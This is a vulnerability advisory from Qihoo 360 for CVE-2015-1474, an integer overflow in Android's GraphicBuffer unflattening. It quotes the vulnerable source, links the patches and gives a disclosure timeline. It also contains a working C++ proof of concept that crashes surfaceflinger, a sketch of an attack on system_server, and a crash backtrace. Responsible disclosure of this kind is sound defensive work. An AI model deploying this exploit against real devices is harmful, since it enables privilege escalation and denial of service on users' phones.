#############################################################################
#
# QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID: CVE-2015-1474
# Product: Android
# Vendor: Google
# Subject: Integer overflow leading to heap corruption while unflattening
GraphicBuffer
# Effect: Gain privileges or cause a denial of service
# Author: Guang Gong
# Date: March 11th 2015
#
#############################################################################
Introduction
------------
Multiple integer overflows in the GraphicBuffer::unflatten function in
platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0
allow attackers to gain privileges or cause a denial of service (memory
corruption) via vectors that trigger a large number of (1) file descriptors
or (2) integer values.
Affected Android version
----------
all versions below Lollipop 5.1
Patches
-------
Android Bug id 18076253
There are two patches for this vulnerabilities, the first patch for this
issue is uncomplete.
[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
Description
-----------
The vulnerable code is as follows.
28
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28>
native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>*
native_handle_create
<http://androidxref.com/4.4.4_r1/s?refs=native_handle_create&project=system>
(int numFds <http://androidxref.com/4.4.4_r1/s?refs=numFds&project=system>,
int numInts <http://androidxref.com/4.4.4_r1/s?refs=numInts&project=system>)
29
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#29>
{
30
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#30>
native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>* h =
malloc <http://androidxref.com/4.4.4_r1/s?defs=malloc&project=system>(
31
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#31>
sizeof(native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>) +
sizeof(int)*(numFds
<http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>+numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
));---------------> integer overflow here, numFds and numInts can be
controlled by normal Apps.
32
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#32>
33
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#33>
h->version
<http://androidxref.com/4.4.4_r1/s?defs=version&project=system> = sizeof(
native_handle_t
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>);
34
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#34>
h->numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>
= numFds <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>;
35
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#35>
h->numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
= numInts
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
;
36
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#36>
return h;
37
<http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#37>
}
244
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#244>
status_t
<http://androidxref.com/4.4.4_r1/s?defs=status_t&project=frameworks>
GraphicBuffer
<http://androidxref.com/4.4.4_r1/s?defs=GraphicBuffer&project=frameworks>::
unflatten
<http://androidxref.com/4.4.4_r1/s?refs=unflatten&project=frameworks>(
245
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#245>
void const*& buffer
<http://androidxref.com/4.4.4_r1/s?defs=buffer&project=frameworks>, size_t
<http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>& size
<http://androidxref.com/4.4.4_r1/s?defs=size&project=frameworks>, int const
*& fds <http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>,
size_t <http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>&
count
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#count>)
{
…
271
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#271>
native_handle
<http://androidxref.com/4.4.4_r1/s?defs=native_handle&project=frameworks>*
h = native_handle_create
<http://androidxref.com/4.4.4_r1/s?defs=native_handle_create&project=frameworks>
(numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
, numInts
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
);
272
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#272>
memcpy
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>, fds
<http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>, numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
*sizeof(int)); ---------------->heap corruption hear.
273
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#273>
memcpy
<http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
<http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks> + numFds
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>,
&buf <http://androidxref.com/4.4.4_r1/s?defs=buf&project=frameworks>[8],
numInts
<http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
*sizeof(int));
….
Attack vector
-------------
A normal Apps can corrupt the heap in surfaceflinger and system_server by
this vulnerabilities.
the PoC of corrupting the heap of surfaceflinger is as follows
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <utils/Log.h>
#include <binder/IPCThreadState.h>
#include <binder/ProcessState.h>
#include <binder/IServiceManager.h>
#include <gui/ISurfaceComposer.h>
#include <gui/BufferQueue.h>
#include <gui/CpuConsumer.h>
#include <unistd.h>
using namespace android;
class MyBufferQueue:public BufferQueue{
public:
status_t onTransact(uint32_t code, const Parcel& data, Parcel*
reply, uint32_t flags){
status_t ret =
BnGraphicBufferProducer::onTransact(code,data,reply,flags);
if(code==1){
int *data = (int *)reply->data();
int *numFDs = data+9;
*numFDs=0xfffffffd;
}
return ret;
}
};
int main()
{
sp<ProcessState> proc(ProcessState::self());
proc->startThreadPool();
const String16 name("SurfaceFlinger");
sp<ISurfaceComposer> composer;
getService(name, &composer);
uint32_t w, h;
PixelFormat f;
sp<IBinder>
display(composer->getBuiltInDisplay(ISurfaceComposer::eDisplayIdMain));
sp<MyBufferQueue> bufferQueue = new MyBufferQueue();
sp<CpuConsumer> cpuConsumer = new CpuConsumer(bufferQueue, 1);
status_t err = composer->captureScreen(display, bufferQueue, 0,0,0,-1UL);
if (err != NO_ERROR) {
fprintf(stderr, "screen capture failed: %s\n", strerror(-err));
exit(0);
}
printf("screen capture success\n");
IPCThreadState::self()->joinThreadPool();
return 0;
}
How to corrupt the heap of system_server
put a malformated GraphicBuffer in a Bundle, and then send it to
system_server via setApplicationRestrictions. it’s the same way as
CVE-2014-7911.
The backtrace of crash surfaceflinger
55 --------- beginning of crash
56 F/libc (15504): Fatal signal 11 (SIGSEGV), code 1, fault addr
0xb1000000 in tid 15504 (surfaceflinger)
57 I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** ***
*** *** ***
58 I/DEBUG ( 180): Build fingerprint:
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
59 I/DEBUG ( 180): Revision: '11'
60 I/DEBUG ( 180): ABI: 'arm'
61 I/DEBUG ( 180): pid: 15504, tid: 15504, name: surfaceflinger >>>
/system/bin/surfaceflinger <<<
62 I/DEBUG ( 180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault
addr 0xb1000000
63 W/NativeCrashListener(15836): Couldn't find ProcessRecord for pid 15504
64 I/DEBUG ( 180): r0 b1000000 r1 b6be41ec r2 ff81eff0 r3
00000004
65 E/DEBUG ( 180): AM write failure (32 / Broken pipe)
66 I/DEBUG ( 180): r4 b647ac00 r5 fffffffd r6 b6302150 r7
00000050
67 I/DEBUG ( 180): r8 bef65734 r9 bef65738 sl bef6573c fp
b081f070
68 I/DEBUG ( 180): ip 80000000 sp bef656f0 lr b6c6cfb7 pc
b6eb2e30 cpsr a00f0030
69 I/DEBUG ( 180):
70 I/DEBUG ( 180): backtrace:
71 I/DEBUG ( 180): #00 pc 0000fe30 /system/lib/libc.so
(__memcpy_base+91) ------------------------->memcpy cause heap corruption
72 I/DEBUG ( 180): #01 pc 00005fb3 /system/lib/libui.so
(android::GraphicBuffer::unflatten(void const*&, unsigned int&, int
const*&, unsigned int&)+98)
73 I/DEBUG ( 180): #02 pc 00025e09 /system/lib/libgui.so
74 I/DEBUG ( 180): #03 pc 0001e985 /system/lib/libbinder.so
(android::Parcel::read(android::Parcel::FlattenableHelperInterface&)
const+176)
75 I/DEBUG ( 180): #04 pc 0002638d /system/lib/libgui.so
76 I/DEBUG ( 180): #05 pc 0002adc3 /system/lib/libgui.so
(android::Surface::dequeueBuffer(ANativeWindowBuffer**, int*)+226)
77 I/DEBUG ( 180): #06 pc 0002aa81 /system/lib/libgui.so
(android::Surface::hook_dequeueBuffer_DEPRECATED(ANativeWindow*,
ANativeWindowBuffer**)+32)
78 I/DEBUG ( 180): #07 pc 000175cf /system/lib/libsurfaceflinger.so
79 I/DEBUG ( 180): #08 pc 0001b80f /system/lib/libsurfaceflinger.so
80 I/DEBUG ( 180): #09 pc 000158f5 /system/lib/libsurfaceflinger.so
81 I/DEBUG ( 180): #10 pc 00010907 /system/lib/libutils.so
(android::Looper::pollInner(int)+410)
82 I/DEBUG ( 180): #11 pc 000109f9 /system/lib/libutils.so
(android::Looper::pollOnce(int, int*, int*, void**)+92)
83 I/DEBUG ( 180): #12 pc 00015ad1 /system/lib/libsurfaceflinger.so
84 I/DEBUG ( 180): #13 pc 0001675d
/system/lib/libsurfaceflinger.so (android::SurfaceFlinger::run()+8)
85 I/DEBUG ( 180): #14 pc 0000083d /system/bin/surfaceflinger
86 I/DEBUG ( 180): #15 pc 0000f811 /system/lib/libc.so
(__libc_init+44)
87 I/DEBUG ( 180): #16 pc 000008d8 /system/bin/surfaceflinger
88 I/DEBUG ( 180):
89 I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_01
90 I/BootReceiver(15836): Copying /data/tombstones/tombstone_01 to DropBox
(SYSTEM_TOMBSTONE)
91 I/ServiceManager( 176): service 'SurfaceFlinger' died
92 I/ServiceManager( 176): service 'display.qservice' died
Milestones
----------
Date
Comment
Sender
20/10/2014
Initial Report of CVE-2015-1474
Qihoo 360
22/10/2014
Forwarded to the dedicated Team by Google
Google
04/11/2014
Classified it as a high severity vulnerability
Google
06/11/2014
Get the Android Bug ID 18076253
Google
10/2/2015
Notify it’s fixed and send the CVE-ID
Google
16/2/2015
Tell Google the first patch was uncomplete
Qihoo 360
18/2/2015
Submitted the second patch
Google
11/3/2015
Lollipop 5.1 was released, disclose it
Qihoo 360
References
----------
[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
[3]https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1474
[4]
http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28
